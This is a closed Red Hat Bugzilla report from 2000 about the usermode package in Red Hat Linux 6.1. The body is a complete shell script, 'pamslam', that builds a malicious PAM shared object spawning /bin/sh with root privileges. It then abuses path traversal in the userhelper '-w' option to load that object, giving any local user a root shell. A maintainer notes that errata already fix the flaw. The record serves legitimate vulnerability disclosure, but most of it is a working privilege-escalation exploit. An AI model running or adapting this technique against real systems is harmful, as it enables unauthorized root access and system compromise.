Bug 9825 - pam crackable
pam crackable
Status: CLOSED ERRATA
Product: Red Hat Linux
Classification: Retired
Component: usermode (Show other bugs)
6.1
All Linux
medium Severity medium
: ---
: ---
Assigned To: Nalin Dahyabhai
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2000-02-28 06:53 EST by Rakesh Tiwari
Modified: 2008-05-01 11:37 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2000-02-28 10:50:12 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:


Attachments (Terms of Use)

  None (edit)
Description Rakesh Tiwari 2000-02-28 06:53:33 EST
by using the script, any normal user on a redhat 61 sever is able to get
'root' rights. The 'id' gets changed to 'root'.
#!/bin/sh
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
    setuid(geteuid());
    system("/bin/sh");
}
EOF

echo -n .

echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf

echo -n .

gcc -fPIC -o _pamslam.o -c _pamslam.c

echo -n o

ld -shared -o _pamslam.so _pamslam.o

echo -n o

chmod 755 _pamslam.so

echo -n O


echo O

/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf

sleep 1s
Comment 1 Bill Nottingham 2000-02-28 10:50:59 EST
This has already been fixed in the errata releases...

Note You need to log in before you can comment on or make changes to this bug.